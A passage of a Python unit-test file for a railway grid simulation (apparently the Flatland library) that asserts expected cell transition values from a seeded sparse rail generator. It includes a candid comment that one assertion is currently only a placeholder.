expected_grid_map[37][7] = 34864
expected_grid_map[37][22] = 32800
expected_grid_map[37][23] = 32800
expected_grid_map[37][24] = 32872
expected_grid_map[37][25] = 1025
expected_grid_map[37][26] = 1025
expected_grid_map[37][27] = 1025
expected_grid_map[37][28] = 1025
expected_grid_map[37][29] = 4608
expected_grid_map[37][30] = 32800
expected_grid_map[37][31] = 32800
expected_grid_map[37][32] = 16386
expected_grid_map[37][33] = 1025
expected_grid_map[37][34] = 1025
expected_grid_map[37][35] = 1025
expected_grid_map[37][36] = 1025
expected_grid_map[37][37] = 1025
expected_grid_map[37][38] = 17411
expected_grid_map[37][39] = 1025
expected_grid_map[37][40] = 1097
expected_grid_map[37][41] = 3089
expected_grid_map[37][42] = 1025
expected_grid_map[37][43] = 1025
expected_grid_map[37][44] = 1025
expected_grid_map[37][45] = 1097
expected_grid_map[37][46] = 3089
expected_grid_map[37][47] = 1025
expected_grid_map[37][48] = 2064
expected_grid_map[38][6] = 32800
expected_grid_map[38][7] = 32872
expected_grid_map[38][8] = 4608
expected_grid_map[38][22] = 32800
expected_grid_map[38][23] = 32800
expected_grid_map[38][24] = 32800
expected_grid_map[38][29] = 32800
expected_grid_map[38][30] = 32800
expected_grid_map[38][31] = 32800
expected_grid_map[38][32] = 32800
expected_grid_map[38][38] = 32800
expected_grid_map[39][6] = 32800
expected_grid_map[39][7] = 32800
expected_grid_map[39][8] = 32800
expected_grid_map[39][22] = 32800
expected_grid_map[39][23] = 32800
expected_grid_map[39][24] = 72
expected_grid_map[39][25] = 1025
expected_grid_map[39][26] = 1025
expected_grid_map[39][27] = 1025
expected_grid_map[39][28] = 1025
expected_grid_map[39][29] = 1097
expected_grid_map[39][30] = 38505
expected_grid_map[39][31] = 3089
expected_grid_map[39][32] = 2064
expected_grid_map[39][38] = 32800
expected_grid_map[40][6] = 32800
expected_grid_map[40][7] = 49186
expected_grid_map[40][8] = 2064
expected_grid_map[40][22] = 32800
expected_grid_map[40][23] = 32800
expected_grid_map[40][30] = 32800
expected_grid_map[40][38] = 32800
expected_grid_map[41][6] = 32872
expected_grid_map[41][7] = 37408
expected_grid_map[41][22] = 32800
expected_grid_map[41][23] = 32800
expected_grid_map[41][30] = 32872
expected_grid_map[41][31] = 4608
expected_grid_map[41][38] = 32800
expected_grid_map[42][6] = 49186
expected_grid_map[42][7] = 34864
expected_grid_map[42][22] = 32800
expected_grid_map[42][23] = 32800
expected_grid_map[42][30] = 49186
expected_grid_map[42][31] = 34864
expected_grid_map[42][38] = 32800
expected_grid_map[43][6] = 32800
expected_grid_map[43][7] = 32800
expected_grid_map[43][11] = 16386
expected_grid_map[43][12] = 1025
expected_grid_map[43][13] = 1025
expected_grid_map[43][14] = 1025
expected_grid_map[43][15] = 1025
expected_grid_map[43][16] = 1025
expected_grid_map[43][17] = 1025
expected_grid_map[43][18] = 1025
expected_grid_map[43][19] = 1025
expected_grid_map[43][20] = 1025
expected_grid_map[43][21] = 1025
expected_grid_map[43][22] = 2064
expected_grid_map[43][23] = 32800
expected_grid_map[43][30] = 32800
expected_grid_map[43][31] = 32800
expected_grid_map[43][38] = 32800
expected_grid_map[44][6] = 72
expected_grid_map[44][7] = 1097
expected_grid_map[44][8] = 1025
expected_grid_map[44][9] = 1025
expected_grid_map[44][10] = 1025
expected_grid_map[44][11] = 3089
expected_grid_map[44][12] = 1025
expected_grid_map[44][13] = 1025
expected_grid_map[44][14] = 1025
expected_grid_map[44][15] = 1025
expected_grid_map[44][16] = 1025
expected_grid_map[44][17] = 1025
expected_grid_map[44][18] = 1025
expected_grid_map[44][19] = 1025
expected_grid_map[44][20] = 1025
expected_grid_map[44][21] = 1025
expected_grid_map[44][22] = 1025
expected_grid_map[44][23] = 2064
expected_grid_map[44][30] = 32800
expected_grid_map[44][31] = 32800
expected_grid_map[44][38] = 32800
expected_grid_map[45][30] = 32800
expected_grid_map[45][31] = 32800
expected_grid_map[45][38] = 32800
expected_grid_map[46][30] = 32872
expected_grid_map[46][31] = 37408
expected_grid_map[46][38] = 32800
expected_grid_map[47][30] = 49186
expected_grid_map[47][31] = 2064
expected_grid_map[47][38] = 32800
expected_grid_map[48][30] = 32800
expected_grid_map[48][38] = 32800
expected_grid_map[49][30] = 72
expected_grid_map[49][31] = 1025
expected_grid_map[49][32] = 1025
expected_grid_map[49][33] = 1025
expected_grid_map[49][34] = 1025
expected_grid_map[49][35] = 1025
expected_grid_map[49][36] = 1025
expected_grid_map[49][37] = 1025
expected_grid_map[49][38] = 2064
    # Attention: once the rail generator is fixed, the hard-coded expected_grid_map above
    # needs to be updated. Until then it is overwritten with the actual grid, so the
    # assertion below is only a placeholder.
expected_grid_map = env.rail.grid
assert np.array_equal(env.rail.grid, expected_grid_map), "actual={}, expected={}".format(env.rail.grid,
expected_grid_map)
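    # Distance sanity check on agent start positions; note that s0/s1 keep only the values
    # computed for the last agent in the loop.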
s0 = 0
s1 = 0
for a in range(env.get_num_agents()):
s0 = Vec2d.get_manhattan_distance(env.agents[a].initial_position, (0, 0))
s1 = Vec2d.get_chebyshev_distance(env.agents[a].initial_position, (0, 0))
assert s0 == 79, "actual={}".format(s0)
assert s1 == 43, "actual={}".format(s1)
def test_sparse_rail_generator_deterministic():
"""Check that sparse_rail_generator runs deterministic over different python versions!"""
speed_ration_map = {1.: 1., # Fast passenger train
1. / 2.: 0., # Fast freight train
1. / 3.: 0., # Slow commuter train
1. / 4.: 0.} # Slow freight train
env = RailEnv(width=25, height=30, rail_generator=sparse_rail_generator(max_num_cities=5,
max_rails_between_cities=3,
seed=215545, # Random seed
grid_mode=True
),
schedule_generator=sparse_schedule_generator(speed_ration_map), number_of_agents=1)
env.reset()
# for r in range(env.height):
# for c in range(env.width):
# print("assert env.rail.get_full_transitions({}, {}) == {}, \"[{}][{}]\"".format(r, c,
# env.rail.get_full_transitions(
# r, c), r, c))
assert env.rail.get_full_transitions(0, 0) == 0, "[0][0]"
assert env.rail.get_full_transitions(0, 1) == 0, "[0][1]"
assert env.rail.get_full_transitions(0, 2) == 0, "[0][2]"
assert env.rail.get_full_transitions(0, 3) == 0, "[0][3]"
assert env.rail.get_full_transitions(0, 4) == 0, "[0][4]"
assert env.rail.get_full_transitions(0, 5) == 0, "[0][5]"
assert env.rail.get_full_transitions(0, 6) == 0, "[0][6]"
assert env.rail.get_full_transitions(0, 7) == 0, "[0][7]"
assert env.rail.get_full_transitions(0, 8) == 0, "[0][8]"
assert env.rail.get_full_transitions(0, 9) == 0, "[0][9]"
assert env.rail.get_full_transitions(0, 10) == 0, "[0][10]"
assert env.rail.get_full_transitions(0, 11) == 0, "[0][11]"
assert env.rail.get_full_transitions(0, 12) == 0, "[0][12]"
assert env.rail.get_full_transitions(0, 13) == 0, "[0][13]"
assert env.rail.get_full_transitions(0, 14) == 0, "[0][14]"
assert env.rail.get_full_transitions(0, 15) == 0, "[0][15]"
assert env.rail.get_full_transitions(0, 16) == 0, "[0][16]"
assert env.rail.get_full_transitions(0, 17) == 0, "[0][17]"
assert env.rail.get_full_transitions(0, 18) == 0, "[0][18]"
assert env.rail.get_full_transitions(0, 19) == 0, "[0][19]"
assert env.rail.get_full_transitions(0, 20) == 0, "[0][20]"
assert env.rail.get_full_transitions(0, 21) == 0, "[0][21]"
assert env.rail.get_full_transitions(0, 22) == 0, "[0][22]"
assert env.rail.get_full_transitions(0, 23) == 0, "[0][23]"
assert env.rail.get_full_transitions(0, 24) == 0, "[0][24]"
assert env.rail.get_full_transitions(1, 0) == 0, "[1][0]"
assert env.rail.get_full_transitions(1, 1) == 0, "[1][1]"
assert env.rail.get_full_transitions(1, 2) == 0, "[1][2]"
assert env.rail.get_full_transitions(1, 3) == 0, "[1][3]"
assert env.rail.get_full_transitions(1, 4) == 0, "[1][4]"
assert env.rail.get_full_transitions(1, 5) == 0, "[1][5]"
assert env.rail.get_full_transitions(1, 6) == 0, "[1][6]"
assert env.rail.get_full_transitions(1, 7) == 0, "[1][7]"
assert env.rail.get_full_transitions(1, 8) == 0, "[1][8]"
assert env.rail.get_full_transitions(1, 9) == 0, "[1][9]"
assert env.rail.get_full_transitions(1, 10) == 0, "[1][10]"
assert env.rail.get_full_transitions(1, 11) == 16386, "[1][11]"
assert env.rail.get_full_transitions(1, 12) == 1025, "[1][12]"
assert env.rail.get_full_transitions(1, 13) == 1025, "[1][13]"
assert env.rail.get_full_transitions(1, 14) == 17411, "[1][14]"
assert env.rail.get_full_transitions(1, 15) == 1025, "[1][15]"
assert env.rail.get_full_transitions(1, 16) == 1025, "[1][16]"
assert env.rail.get_full_transitions(1, 17) == 1025, "[1][17]"
assert env.rail.get_full_transitions(1, 18) == 1025, "[1][18]"
assert env.rail.get_full_transitions(1, 19) == 4608, "[1][19]"
assert env.rail.get_full_transitions(1, 20) == 0, "[1][20]"
assert env.rail.get_full_transitions(1, 21) == 0, "[1][21]"
assert env.rail.get_full_transitions(1, 22) == 0, "[1][22]"
assert env.rail.get_full_transitions(1, 23) == 0, "[1][23]"
assert env.rail.get_full_transitions(1, 24) == 0, "[1][24]"
assert env.rail.get_full_transitions(2, 0) == 0, "[2][0]"
assert env.rail.get_full_transitions(2, 1) == 0, "[2][1]"
assert env.rail.get_full_transitions(2, 2) == 0, "[2][2]"
assert env.rail.get_full_transitions(2, 3) == 0, "[2][3]"
assert env.rail.get_full_transitions(2, 4) == 0, "[2][4]"
assert env.rail.get_full_transitions(2, 5) == 0, "[2][5]"
assert env.rail.get_full_transitions(2, 6) == 0, "[2][6]"
assert env.rail.get_full_transitions(2, 7) == 0, "[2][7]"
assert env.rail.get_full_transitions(2, 8) == 0, "[2][8]"
assert env.rail.get_full_transitions(2, 9) == 0, "[2][9]"
assert env.rail.get_full_transitions(2, 10) == 0, "[2][10]"
assert env.rail.get_full_transitions(2, 11) == 32800, "[2][11]"
assert env.rail.get_full_transitions(2, 12) == 0, "[2][12]"
assert env.rail.get_full_transitions(2, 13) == 0, "[2][13]"
assert env.rail.get_full_transitions(2, 14) == 32800, "[2][14]"
assert env.rail.get_full_transitions(2, 15) == 0, "[2][15]"
assert env.rail.get_full_transitions(2, 16) == 0, "[2][16]"
assert env.rail.get_full_transitions(2, 17) == 0, "[2][17]"
assert env.rail.get_full_transitions(2, 18) == 0, "[2][18]"
assert env.rail.get_full_transitions(2, 19) == 32800, "[2][19]"
assert env.rail.get_full_transitions(2, 20) == 0, "[2][20]"
assert env.rail.get_full_transitions(2, 21) == 0, "[2][21]"
assert env.rail.get_full_transitions(2, 22) == 0, "[2][22]"
assert env.rail.get_full_transitions(2, 23) == 0, "[2][23]"
assert env.rail.get_full_transitions(2, 24) == 0, "[2][24]"
assert env.rail.get_full_transitions(3, 0) == 0, "[3][0]"
assert env.rail.get_full_transitions(3, 1) == 0, "[3][1]"
assert env.rail.get_full_transitions(3, 2) == 0, "[3][2]"
assert env.rail.get_full_transitions(3, 3) == 0, "[3][3]"
assert env.rail.get_full_transitions(3, 4) == 0, "[3][4]"
assert env.rail.get_full_transitions(3, 5) == 0, "[3][5]"
assert env.rail.get_full_transitions(3, 6) == 0, "[3][6]"
assert env.rail.get_full_transitions(3, 7) == 0, "[3][7]"
assert env.rail.get_full_transitions(3, 8) == 0, "[3][8]"
assert env.rail.get_full_transitions(3, 9) == 0, "[3][9]"
assert env.rail.get_full_transitions(3, 10) == 0, "[3][10]"
assert env.rail.get_full_transitions(3, 11) == 32800, "[3][11]"
assert env.rail.get_full_transitions(3, 12) == 0, "[3][12]"
assert env.rail.get_full_transitions(3, 13) == 0, "[3][13]"
assert env.rail.get_full_transitions(3, 14) == 32800, "[3][14]"
assert env.rail.get_full_transitions(3, 15) == 0, "[3][15]"
assert env.rail.get_full_transitions(3, 16) == 0, "[3][16]"
assert env.rail.get_full_transitions(3, 17) == 0, "[3][17]"
assert env.rail.get_full_transitions(3, 18) == 0, "[3][18]"
assert env.rail.get_full_transitions(3, 19) == 32872, "[3][19]"
assert env.rail.get_full_transitions(3, 20) == 4608, "[3][20]"
assert env.rail.get_full_transitions(3, 21) == 0, "[3][21]"
assert env.rail.get_full_transitions(3, 22) == 0, "[3][22]"
assert env.rail.get_full_transitions(3, 23) == 0, "[3][23]"
assert env.rail.get_full_transitions(3, 24) == 0, "[3][24]"
assert env.rail.get_full_transitions(4, 0) == 0, "[4][0]"
assert env.rail.get_full_transitions(4, 1) == 0, "[4][1]"
assert env.rail.get_full_transitions(4, 2) == 0, "[4][2]"
assert env.rail.get_full_transitions(4, 3) == 0, "[4][3]"
assert env.rail.get_full_transitions(4, 4) == 0, "[4][4]"
assert env.rail.get_full_transitions(4, 5) == 0, "[4][5]"
assert env.rail.get_full_transitions(4, 6) == 0, "[4][6]"
assert env.rail.get_full_transitions(4, 7) == 0, "[4][7]"
assert env.rail.get_full_transitions(4, 8) == 0, "[4][8]"
assert env.rail.get_full_transitions(4, 9) == 0, "[4][9]"
assert env.rail.get_full_transitions(4, 10) == 0, "[4][10]"
assert env.rail.get_full_transitions(4, 11) == 32800, "[4][11]"
assert env.rail.get_full_transitions(4, 12) == 0, "[4][12]"
assert env.rail.get_full_transitions(4, 13) == 0, "[4][13]"
assert env.rail.get_full_transitions(4, 14) == 32800, "[4][14]"
assert env.rail.get_full_transitions(4, 15) == 0, "[4][15]"
assert env.rail.get_full_transitions(4, 16) == 0, "[4][16]"
assert env.rail.get_full_transitions(4, 17) == 0, "[4][17]"
assert env.rail.get_full_transitions(4, 18) == 0, "[4][18]"
assert env.rail.get_full_transitions(4, 19) == 49186, "[4][19]"
assert env.rail.get_full_transitions(4, 20) == 34864, "[4][20]"
assert env.rail.get_full_transitions(4, 21) == 0, "[4][21]"
assert env.rail.get_full_transitions(4, 22) == 0, "[4][22]"
assert env.rail.get_full_transitions(4, 23) == 0, "[4][23]"
assert env.rail.get_full_transitions(4, 24) == 0, "[4][24]"
assert env.rail.get_full_transitions(5, 0) == 0, "[5][0]"
assert env.rail.get_full_transitions(5, 1) == 0, "[5][1]"
assert env.rail.get_full_transitions(5, 2) == 0, "[5][2]"
assert env.rail.get_full_transitions(5, 3) == 0, "[5][3]"
assert env.rail.get_full_transitions(5, 4) == 0, "[5][4]"
assert env.rail.get_full_transitions(5, 5) == 0, "[5][5]"
assert env.rail.get_full_transitions(5, 6) == 0, "[5][6]"
assert env.rail.get_full_transitions(5, 7) == 0, "[5][7]"
assert env.rail.get_full_transitions(5, 8) == 0, "[5][8]"
assert env.rail.get_full_transitions(5, 9) == 0, "[5][9]"
assert env.rail.get_full_transitions(5, 10) == 0, "[5][10]"
assert env.rail.get_full_transitions(5, 11) == 32800, "[5][11]"
assert env.rail.get_full_transitions(5, 12) == 0, "[5][12]"
assert env.rail.get_full_transitions(5, 13) == 0, "[5][13]"
assert env.rail.get_full_transitions(5, 14) == 32800, "[5][14]"
assert env.rail.get_full_transitions(5, 15) == 0, "[5][15]"
assert env.rail.get_full_transitions(5, 16) == 0, "[5][16]"
assert env.rail.get_full_transitions(5, 17) == 0, "[5][17]"
assert env.rail.get_full_transitions(5, 18) == 0, "[5][18]"
assert env.rail.get_full_transitions(5, 19) == 32800, "[5][19]"
assert env.rail.get_full_transitions(5, 20) == 32800, "[5][20]"
assert env.rail.get_full_transitions(5, 21) == 0, "[5][21]"
assert env.rail.get_full_transitions(5, 22) == 0, "[5][22]"
assert env.rail.get_full_transitions(5, 23) == 0, "[5][23]"
assert env.rail.get_full_transitions(5, 24) == 0, "[5][24]"
assert env.rail.get_full_transitions(6, 0) == 16386, "[6][0]"
assert env.rail.get_full_transitions(6, 1) == 17411, "[6][1]"
assert env.rail.get_full_transitions(6, 2) == 1025, "[6][2]"
assert env.rail.get_full_transitions(6, 3) == 5633, "[6][3]"
assert env.rail.get_full_transitions(6, 4) == 17411, "[6][4]"
assert env.rail.get_full_transitions(6, 5) == 1025, "[6][5]"
assert env.rail.get_full_transitions(6, 6) == 1025, "[6][6]"
assert env.rail.get_full_transitions(6, 7) == 1025, "[6][7]"
assert env.rail.get_full_transitions(6, 8) == 5633, "[6][8]"
assert env.rail.get_full_transitions(6, 9) == 17411, "[6][9]"
assert env.rail.get_full_transitions(6, 10) == 1025, "[6][10]"
assert env.rail.get_full_transitions(6, 11) == 3089, "[6][11]"
assert env.rail.get_full_transitions(6, 12) == 1025, "[6][12]"
assert env.rail.get_full_transitions(6, 13) == 1025, "[6][13]"
assert env.rail.get_full_transitions(6, 14) == 2064, "[6][14]"
assert env.rail.get_full_transitions(6, 15) == 0, "[6][15]"
assert env.rail.get_full_transitions(6, 16) == 0, "[6][16]"
assert env.rail.get_full_transitions(6, 17) == 0, "[6][17]"
assert env.rail.get_full_transitions(6, 18) == 0, "[6][18]"
assert env.rail.get_full_transitions(6, 19) == 32800, "[6][19]"
assert env.rail.get_full_transitions(6, 20) == 32800, "[6][20]"
assert env.rail.get_full_transitions(6, 21) == 0, "[6][21]"
assert env.rail.get_full_transitions(6, 22) == 0, "[6][22]"
assert env.rail.get_full_transitions(6, 23) == 0, "[6][23]"
assert env.rail.get_full_transitions(6, 24) == 0, "[6][24]"
assert env.rail.get_full_transitions(7, 0) == 32800, "[7][0]"
assert env.rail.get_full_transitions(7, 1) == 32800, "[7][1]"
assert env.rail.get_full_transitions(7, 2) == 0, "[7][2]"
assert env.rail.get_full_transitions(7, 3) == 72, "[7][3]"
assert env.rail.get_full_transitions(7, 4) == 3089, "[7][4]"
assert env.rail.get_full_transitions(7, 5) == 1025, "[7][5]"
assert env.rail.get_full_transitions(7, 6) == 1025, "[7][6]"
assert env.rail.get_full_transitions(7, 7) == 1025, "[7][7]"
assert env.rail.get_full_transitions(7, 8) == 1097, "[7][8]"
assert env.rail.get_full_transitions(7, 9) == 2064, "[7][9]"
assert env.rail.get_full_transitions(7, 10) == 0, "[7][10]"
assert env.rail.get_full_transitions(7, 11) == 0, "[7][11]"
assert env.rail.get_full_transitions(7, 12) == 0, "[7][12]"
assert env.rail.get_full_transitions(7, 13) == 0, "[7][13]"
assert env.rail.get_full_transitions(7, 14) == 0, "[7][14]"
assert env.rail.get_full_transitions(7, 15) == 0, "[7][15]"
assert env.rail.get_full_transitions(7, 16) == 0, "[7][16]"
assert env.rail.get_full_transitions(7, 17) == 0, "[7][17]"
assert env.rail.get_full_transitions(7, 18) == 0, "[7][18]"
assert env.rail.get_full_transitions(7, 19) == 32800, "[7][19]"
assert env.rail.get_full_transitions(7, 20) == 32800, "[7][20]"
assert env.rail.get_full_transitions(7, 21) == 0, "[7][21]"
assert env.rail.get_full_transitions(7, 22) == 0, "[7][22]"
assert env.rail.get_full_transitions(7, 23) == 0, "[7][23]"
assert env.rail.get_full_transitions(7, 24) == 0, "[7][24]"
assert env.rail.get_full_transitions(8, 0) == 32800, "[8][0]"
assert env.rail.get_full_transitions(8, 1) == 32800, "[8][1]"
assert env.rail.get_full_transitions(8, 2) == 0, "[8][2]"
assert env.rail.get_full_transitions(8, 3) == 0, "[8][3]"
assert env.rail.get_full_transitions(8, 4) == 0, "[8][4]"
assert env.rail.get_full_transitions(8, 5) == 0, "[8][5]"
assert env.rail.get_full_transitions(8, 6) == 0, "[8][6]"
assert env.rail.get_full_transitions(8, 7) == 0, "[8][7]"
assert env.rail.get_full_transitions(8, 8) == 0, "[8][8]"
assert env.rail.get_full_transitions(8, 9) == 0, "[8][9]"
assert env.rail.get_full_transitions(8, 10) == 0, "[8][10]"
assert env.rail.get_full_transitions(8, 11) == 0, "[8][11]"
assert env.rail.get_full_transitions(8, 12) == 0, "[8][12]"
assert env.rail.get_full_transitions(8, 13) == 0, "[8][13]"
assert env.rail.get_full_transitions(8, 14) == 0, "[8][14]"
assert env.rail.get_full_transitions(8, 15) == 0, "[8][15]"
assert env.rail.get_full_transitions(8, 16) == 0, "[8][16]"
assert env.rail.get_full_transitions(8, 17) == 0, "[8][17]"
assert env.rail.get_full_transitions(8, 18) == 0, "[8][18]"
assert env.rail.get_full_transitions(8, 19) == 32872, "[8][19]"
assert env.rail.get_full_transitions(8, 20) == 37408, "[8][20]"
assert env.rail.get_full_transitions(8, 21) == 0, "[8][21]"
assert env.rail.get_full_transitions(8, 22) == 0, "[8][22]"
assert env.rail.get_full_transitions(8, 23) == 0, "[8][23]"
assert env.rail.get_full_transitions(8, 24) == 0, "[8][24]"
assert env.rail.get_full_transitions(9, 0) == 32800, "[9][0]"
assert env.rail.get_full_transitions(9, 1) == 32800, "[9][1]"
assert env.rail.get_full_transitions(9, 2) == 0, "[9][2]"
assert env.rail.get_full_transitions(9, 3) == 0, "[9][3]"
assert env.rail.get_full_transitions(9, 4) == 0, "[9][4]"
assert env.rail.get_full_transitions(9, 5) == 0, "[9][5]"
assert env.rail.get_full_transitions(9, 6) == 0, "[9][6]"
assert env.rail.get_full_transitions(9, 7) == 0, "[9][7]"
assert env.rail.get_full_transitions(9, 8) == 0, "[9][8]"
assert env.rail.get_full_transitions(9, 9) == 0, "[9][9]"
assert env.rail.get_full_transitions(9, 10) == 0, "[9][10]"
assert env.rail.get_full_transitions(9, 11) == 0, "[9][11]"
assert env.rail.get_full_transitions(9, 12) == 0, "[9][12]"
assert env.rail.get_full_transitions(9, 13) == 0, "[9][13]"
assert env.rail.get_full_transitions(9, 14) == 0, "[9][14]"
assert env.rail.get_full_transitions(9, 15) == 0, "[9][15]"
assert env.rail.get_full_transitions(9, 16) == 0, "[9][16]"
assert env.rail.get_full_transitions(9, 17) == 0, "[9][17]"
assert env.rail.get_full_transitions(9, 18) == 0, "[9][18]"
assert env.rail.get_full_transitions(9, 19) == 49186, "[9][19]"
assert env.rail.get_full_transitions(9, 20) == 2064, "[9][20]"
assert env.rail.get_full_transitions(9, 21) == 0, "[9][21]"
assert env.rail.get_full_transitions(9, 22) == 0, "[9][22]"
assert env.rail.get_full_transitions(9, 23) == 0, "[9][23]"
assert env.rail.get_full_transitions(9, 24) == 0, "[9][24]"
assert env.rail.get_full_transitions(10, 0) == 32800, "[10][0]"
assert env.rail.get_full_transitions(10, 1) == 32800, "[10][1]"
assert env.rail.get_full_transitions(10, 2) == 0, "[10][2]"
assert env.rail.get_full_transitions(10, 3) == 0, "[10][3]"
assert env.rail.get_full_transitions(10, 4) == 0, "[10][4]"
assert env.rail.get_full_transitions(10, 5) == 0, "[10][5]"
assert env.rail.get_full_transitions(10, 6) == 0, "[10][6]"
assert env.rail.get_full_transitions(10, 7) == 0, "[10][7]"
assert env.rail.get_full_transitions(10, 8) == 0, "[10][8]"
assert env.rail.get_full_transitions(10, 9) == 0, "[10][9]"
assert env.rail.get_full_transitions(10, 10) == 0, "[10][10]"
assert env.rail.get_full_transitions(10, 11) == 0, "[10][11]"
assert env.rail.get_full_transitions(10, 12) == 0, "[10][12]"
assert env.rail.get_full_transitions(10, 13) == 0, "[10][13]"
assert env.rail.get_full_transitions(10, 14) == 0, "[10][14]"
assert env.rail.get_full_transitions(10, 15) == 0, "[10][15]"
assert env.rail.get_full_transitions(10, 16) == 0, "[10][16]"
assert env.rail.get_full_transitions(10, 17) == 0, "[10][17]"
assert env.rail.get_full_transitions(10, 18) == 0, "[10][18]"
assert env.rail.get_full_transitions(10, 19) == 32800, "[10][19]"
assert env.rail.get_full_transitions(10, 20) == 0, "[10][20]"
assert env.rail.get_full_transitions(10, 21) == 0, "[10][21]"
assert env.rail.get_full_transitions(10, 22) == 0, "[10][22]"
assert env.rail.get_full_transitions(10, 23) == 0, "[10][23]"
assert env.rail.get_full_transitions(10, 24) == 0, "[10][24]"
assert env.rail.get_full_transitions(11, 0) == 32800, "[11][0]"
assert env.rail.get_full_transitions(11, 1) == 32800, "[11][1]"
assert env.rail.get_full_transitions(11, 2) == 0, "[11][2]"
assert env.rail.get_full_transitions(11, 3) == 0, "[11][3]"
assert env.rail.get_full_transitions(11, 4) == 0, "[11][4]"
assert env.rail.get_full_transitions(11, 5) == 0, "[11][5]"
assert env.rail.get_full_transitions(11, 6) == 0, "[11][6]"
assert env.rail.get_full_transitions(11, 7) == 0, "[11][7]"
assert env.rail.get_full_transitions(11, 8) == 0, "[11][8]"
assert env.rail.get_full_transitions(11, 9) == 0, "[11][9]"
assert env.rail.get_full_transitions(11, 10) == 0, "[11][10]"
assert env.rail.get_full_transitions(11, 11) == 0, "[11][11]"
assert env.rail.get_full_transitions(11, 12) == 0, "[11][12]"
assert env.rail.get_full_transitions(11, 13) == 0, "[11][13]"
assert env.rail.get_full_transitions(11, 14) == 0, "[11][14]"
assert env.rail.get_full_transitions(11, 15) == 0, "[11][15]"
assert env.rail.get_full_transitions(11, 16) == 0, "[11][16]"
assert env.rail.get_full_transitions(11, 17) == 0, "[11][17]"
assert env.rail.get_full_transitions(11, 18) == 0, "[11][18]"
assert env.rail.get_full_transitions(11, 19) == 32872, "[11][19]"
assert env.rail.get_full_transitions(11, 20) == 5633, "[11][20]"
assert env.rail.get_full_transitions(11, 21) == 4608, "[11][21]"
assert env.rail.get_full_transitions(11, 22) == 0, "[11][22]"
assert env.rail.get_full_transitions(11, 23) == 0, "[11][23]"
assert env.rail.get_full_transitions(11, 24) == 0, "[11][24]"
assert env.rail.get_full_transitions(12, 0) == 32800, "[12][0]"
assert env.rail.get_full_transitions(12, 1) == 32800, "[12][1]"
assert env.rail.get_full_transitions(12, 2) == 0, "[12][2]"
assert env.rail.get_full_transitions(12, 3) == 0, "[12][3]"
assert env.rail.get_full_transitions(12, 4) == 0, "[12][4]"
assert env.rail.get_full_transitions(12, 5) == 0, "[12][5]"
assert env.rail.get_full_transitions(12, 6) == 0, "[12][6]"
assert env.rail.get_full_transitions(12, 7) == 0, "[12][7]"
assert env.rail.get_full_transitions(12, 8) == 0, "[12][8]"
assert env.rail.get_full_transitions(12, 9) == 0, "[12][9]"
assert env.rail.get_full_transitions(12, 10) == 0, "[12][10]"
assert env.rail.get_full_transitions(12, 11) == 0, "[12][11]"
assert env.rail.get_full_transitions(12, 12) == 0, "[12][12]"
assert env.rail.get_full_transitions(12, 13) == 0, "[12][13]"
assert env.rail.get_full_transitions(12, 14) == 0, "[12][14]"
assert env.rail.get_full_transitions(12, 15) == 0, "[12][15]"
assert env.rail.get_full_transitions(12, 16) == 0, "[12][16]"
assert env.rail.get_full_transitions(12, 17) == 0, "[12][17]"
assert env.rail.get_full_transitions(12, 18) == 0, "[12][18]"
assert env.rail.get_full_transitions(12, 19) == 32800, "[12][19]"
assert env.rail.get_full_transitions(12, 20) == 32800, "[12][20]"
assert env.rail.get_full_transitions(12, 21) == 32800, "[12][21]"
assert env.rail.get_full_transitions(12, 22) == 0, "[12][22]"
assert env.rail.get_full_transitions(12, 23) == 0, "[12][23]"
assert env.rail.get_full_transitions(12, 24) == 0, "[12][24]"
assert env.rail.get_full_transitions(13, 0) == 32800, "[13][0]"
assert env.rail.get_full_transitions(13, 1) == 32800, "[13][1]"
assert env.rail.get_full_transitions(13, 2) == 0, "[13][2]"
assert env.rail.get_full_transitions(13, 3) == 0, "[13][3]"
assert env.rail.get_full_transitions(13, 4) == 0, "[13][4]"
assert env.rail.get_full_transitions(13, 5) == 0, "[13][5]"
assert env.rail.get_full_transitions(13, 6) == 0, "[13][6]"
assert env.rail.get_full_transitions(13, 7) == 0, "[13][7]"
assert env.rail.get_full_transitions(13, 8) == 0, "[13][8]"
assert env.rail.get_full_transitions(13, 9) == 0, "[13][9]"
assert env.rail.get_full_transitions(13, 10) == 0, "[13][10]"
assert env.rail.get_full_transitions(13, 11) == 0, "[13][11]"
assert env.rail.get_full_transitions(13, 12) == 0, "[13][12]"
assert env.rail.get_full_transitions(13, 13) == 0, "[13][13]"
assert env.rail.get_full_transitions(13, 14) == 0, "[13][14]"
assert env.rail.get_full_transitions(13, 15) == 0, "[13][15]"
assert env.rail.get_full_transitions(13, 16) == 0, "[13][16]"
assert env.rail.get_full_transitions(13, 17) == 0, "[13][17]"
assert env.rail.get_full_transitions(13, 18) == 0, "[13][18]"
assert env.rail.get_full_transitions(13, 19) == 32800, "[13][19]"
assert env.rail.get_full_transitions(13, 20) == 32800, "[13][20]"
assert env.rail.get_full_transitions(13, 21) == 32800, "[13][21]"
assert env.rail.get_full_transitions(13, 22) == 0, "[13][22]"
assert env.rail.get_full_transitions(13, 23) == 0, "[13][23]"
assert env.rail.get_full_transitions(13, 24) == 0, "[13][24]"
assert env.rail.get_full_transitions(14, 0) == 32800, "[14][0]"
assert env.rail.get_full_transitions(14, 1) == 32800, "[14][1]"
assert env.rail.get_full_transitions(14, 2) == 0, "[14][2]"
assert env.rail.get_full_transitions(14, 3) == 0, "[14][3]"
assert env.rail.get_full_transitions(14, 4) == 0, "[14][4]"
assert env.rail.get_full_transitions(14, 5) == 0, "[14][5]"
assert env.rail.get_full_transitions(14, 6) == 0, "[14][6]"
assert env.rail.get_full_transitions(14, 7) == 0, "[14][7]"
assert env.rail.get_full_transitions(14, 8) == 0, "[14][8]"
assert env.rail.get_full_transitions(14, 9) == 0, "[14][9]"
assert env.rail.get_full_transitions(14, 10) == 0, "[14][10]"
assert env.rail.get_full_transitions(14, 11) == 0, "[14][11]"
assert env.rail.get_full_transitions(14, 12) == 0, "[14][12]"
assert env.rail.get_full_transitions(14, 13) == 0, "[14][13]"
assert env.rail.get_full_transitions(14, 14) == 0, "[14][14]"
assert env.rail.get_full_transitions(14, 15) == 0, "[14][15]"
assert env.rail.get_full_transitions(14, 16) == 0, "[14][16]"
assert env.rail.get_full_transitions(14, 17) == 0, "[14][17]"
assert env.rail.get_full_transitions(14, 18) == 0, "[14][18]"
assert env.rail.get_full_transitions(14, 19) == 32800, "[14][19]"
assert env.rail.get_full_transitions(14, 20) == 32800, "[14][20]"
assert env.rail.get_full_transitions(14, 21) == 32800, "[14][21]"
assert env.rail.get_full_transitions(14, 22) == 0, "[14][22]"
